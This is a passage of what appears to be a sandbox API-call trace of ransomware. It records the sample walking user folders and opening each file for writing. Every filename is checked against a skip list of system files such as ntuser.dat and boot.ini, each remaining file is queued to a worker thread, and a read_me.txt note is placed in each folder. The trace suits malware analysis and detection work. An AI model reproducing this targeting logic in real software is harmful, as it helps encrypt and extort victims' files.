ftLastAccessTime.dwLowDateTime=0x16a28970, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a28970, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.054] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0074.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x828 [0074.054] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.054] CloseHandle (hObject=0x828) returned 1 [0074.055] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0074.055] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0074.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x828 [0074.061] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="read_me.txt") returned 0x0 [0074.061] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="autoexec.bat") returned 0x0 [0074.061] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="desktop.ini") returned 0x0 [0074.061] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="autorun.inf") returned 0x0 [0074.061] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntuser.dat") returned 0x0 [0074.062] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="iconcache.db") returned 0x0 [0074.062] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="bootsect.bak") returned 0x0 [0074.062] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="boot.ini") returned 0x0 [0074.062] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="ntuser.dat.log") returned 0x0 [0074.062] StrStrW (lpFirst="sikvnb huvuib.contact", lpSrch="thumbs.db") returned 0x0 [0074.062] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 45 [0074.062] QueueUserWorkItem (Function=0x404e00, Context=0x828, Flags=0x0) returned 1 [0074.062] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0074.062] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0074.062] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0074.062] GetProcessHeap () returned 0x280000 [0074.062] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0074.062] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 41 [0074.062] GetProcessHeap () returned 0x280000 [0074.062] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0074.062] GetProcessHeap () returned 0x280000 [0074.062] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0074.062] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\*") returned 80 [0074.062] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.062] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\.") returned 80 [0074.062] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3f75d00, ftCreationTime.dwHighDateTime=0x1d4d09c, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.062] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\..") returned 81 [0074.063] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd67be9e0, ftCreationTime.dwHighDateTime=0x1d4cd80, ftLastAccessTime.dwLowDateTime=0x66529140, ftLastAccessTime.dwHighDateTime=0x1d4c890, ftLastWriteTime.dwLowDateTime=0x66529140, ftLastWriteTime.dwHighDateTime=0x1d4c890, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="AHzFw9uT7csYzjH-YBK.mp3", cAlternateFileName="AHZFW9~1.MP3")) returned 1 [0074.063] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\AHzFw9uT7csYzjH-YBK.mp3") returned 102 [0074.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\AHzFw9uT7csYzjH-YBK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\ahzfw9ut7csyzjh-ybk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x83c [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="read_me.txt") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="autoexec.bat") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="desktop.ini") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="autorun.inf") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="ntuser.dat") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="iconcache.db") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="bootsect.bak") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="boot.ini") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0074.063] StrStrW (lpFirst="ahzfw9ut7csyzjh-ybk.mp3", lpSrch="thumbs.db") returned 0x0 [0074.063] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 46 [0074.063] QueueUserWorkItem (Function=0x404e00, Context=0x83c, Flags=0x0) returned 1 [0074.063] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb481b000, ftCreationTime.dwHighDateTime=0x1d4d513, ftLastAccessTime.dwLowDateTime=0xfac7e240, ftLastAccessTime.dwHighDateTime=0x1d4d07d, ftLastWriteTime.dwLowDateTime=0xfac7e240, ftLastWriteTime.dwHighDateTime=0x1d4d07d, nFileSizeHigh=0x0, nFileSizeLow=0x7f6e, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="LnpX_dH.docx", cAlternateFileName="LNPX_D~1.DOC")) returned 1 [0074.063] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\LnpX_dH.docx") returned 91 [0074.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\LnpX_dH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\lnpx_dh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x840 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="read_me.txt") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="autoexec.bat") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="desktop.ini") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="autorun.inf") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="ntuser.dat") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="iconcache.db") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="bootsect.bak") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="boot.ini") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="ntuser.dat.log") returned 0x0 [0074.064] StrStrW (lpFirst="lnpx_dh.docx", lpSrch="thumbs.db") returned 0x0 [0074.064] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 47 [0074.064] QueueUserWorkItem (Function=0x404e00, Context=0x840, Flags=0x0) returned 1 [0074.064] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.064] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\read_me.txt") returned 90 [0074.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x844 [0074.064] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0074.064] CloseHandle (hObject=0x844) returned 1 [0074.064] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="vPe92_uuRvFYmIY", cAlternateFileName="VPE92_~1")) returned 1 [0074.064] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY") returned 94 [0074.065] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41060870, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x2dc20e0, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0x2dc20e0, ftLastWriteTime.dwHighDateTime=0x1d4c732, nFileSizeHigh=0x0, nFileSizeLow=0x15c22, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="ymfW8vhK.swf", cAlternateFileName="")) returned 1 [0074.065] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\ymfW8vhK.swf") returned 91 [0074.065] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\ymfW8vhK.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\ymfw8vhk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x844 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="read_me.txt") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="autoexec.bat") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="desktop.ini") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="autorun.inf") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="ntuser.dat") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="iconcache.db") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="bootsect.bak") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="boot.ini") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="ntuser.dat.log") returned 0x0 [0074.065] StrStrW (lpFirst="ymfw8vhk.swf", lpSrch="thumbs.db") returned 0x0 [0074.065] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 48 [0074.065] QueueUserWorkItem (Function=0x404e00, Context=0x844, Flags=0x0) returned 1 [0074.065] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41060870, ftCreationTime.dwHighDateTime=0x1d4cfbd, ftLastAccessTime.dwLowDateTime=0x2dc20e0, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0x2dc20e0, ftLastWriteTime.dwHighDateTime=0x1d4c732, nFileSizeHigh=0x0, nFileSizeLow=0x15c22, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="ymfw8vhk.swf", cAlternateFileName="")) returned 0 [0074.065] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0074.065] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\read_me.txt") returned 90 [0074.065] GetProcessHeap () returned 0x280000 [0074.065] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0074.066] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 42 [0074.066] GetProcessHeap () returned 0x280000 [0074.066] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8aa00b0 | out: hHeap=0x280000) returned 1 [0074.066] GetProcessHeap () returned 0x280000 [0074.066] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8aa00b0 [0074.066] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\*") returned 96 [0074.066] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0074.066] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\.") returned 96 [0074.066] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x268a9cd0, ftCreationTime.dwHighDateTime=0x1d4c997, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.066] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\..") returned 97 [0074.066] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb1937780, ftCreationTime.dwHighDateTime=0x1d4d454, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="5q 1", cAlternateFileName="5Q1~1")) returned 1 [0074.066] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\5q 1") returned 99 [0074.066] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c94730, ftCreationTime.dwHighDateTime=0x1d4c563, ftLastAccessTime.dwLowDateTime=0xd28bebd0, ftLastAccessTime.dwHighDateTime=0x1d4cd50, ftLastWriteTime.dwLowDateTime=0xd28bebd0, ftLastWriteTime.dwHighDateTime=0x1d4cd50, nFileSizeHigh=0x0, nFileSizeLow=0xc62b, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="gYB5HFNX.flv", cAlternateFileName="")) returned 1 [0074.066] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\gYB5HFNX.flv") returned 107 [0074.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\gYB5HFNX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\gyb5hfnx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x848 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="read_me.txt") returned 0x0 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="autoexec.bat") returned 0x0 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="desktop.ini") returned 0x0 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="autorun.inf") returned 0x0 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="ntuser.dat") returned 0x0 [0074.066] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="iconcache.db") returned 0x0 [0074.067] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="bootsect.bak") returned 0x0 [0074.067] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="boot.ini") returned 0x0 [0074.067] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="ntuser.dat.log") returned 0x0 [0074.067] StrStrW (lpFirst="gyb5hfnx.flv", lpSrch="thumbs.db") returned 0x0 [0074.067] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 49 [0074.067] QueueUserWorkItem (Function=0x404e00, Context=0x848, Flags=0x0) returned 1 [0074.067] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x298377a0, ftCreationTime.dwHighDateTime=0x1d4c6bc, ftLastAccessTime.dwLowDateTime=0x764921c0, ftLastAccessTime.dwHighDateTime=0x1d4c8bf, ftLastWriteTime.dwLowDateTime=0x764921c0, ftLastWriteTime.dwHighDateTime=0x1d4c8bf, nFileSizeHigh=0x0, nFileSizeLow=0x1655e, dwReserved0=0xa0000003, dwReserved1=0x280000, cFileName="psApFJEI4E87T.png", cAlternateFileName="PSAPFJ~1.PNG")) returned 1 [0074.067] wnsprintfW (in: pszDest=0x8aa00b0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\psApFJEI4E87T.png") returned 112 [0074.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1\\lnC8VFH_7XvA0rvnIlk_\\vPe92_uuRvFYmIY\\psApFJEI4E87T.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aeutpkyrnlsv9u1\\lnc8vfh_7xva0rvnilk_\\vpe92_uurvfymiy\\psapfjei4e87t.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84c [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="read_me.txt") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="autoexec.bat") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="desktop.ini") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="autorun.inf") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="ntuser.dat") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="iconcache.db") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="bootsect.bak") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="boot.ini") returned 0x0 [0074.067] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="ntuser.dat.log") returned 0x0 [0074.068] StrStrW (lpFirst="psapfjei4e87t.png", lpSrch="thumbs.db") returned 0x0 [0074.068] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 50 [0074.068] QueueUserWorkItem (Function=0x404e00, Context=0x84c, Flags=0x0) returned 1 [0074.068] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16a74c30, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, 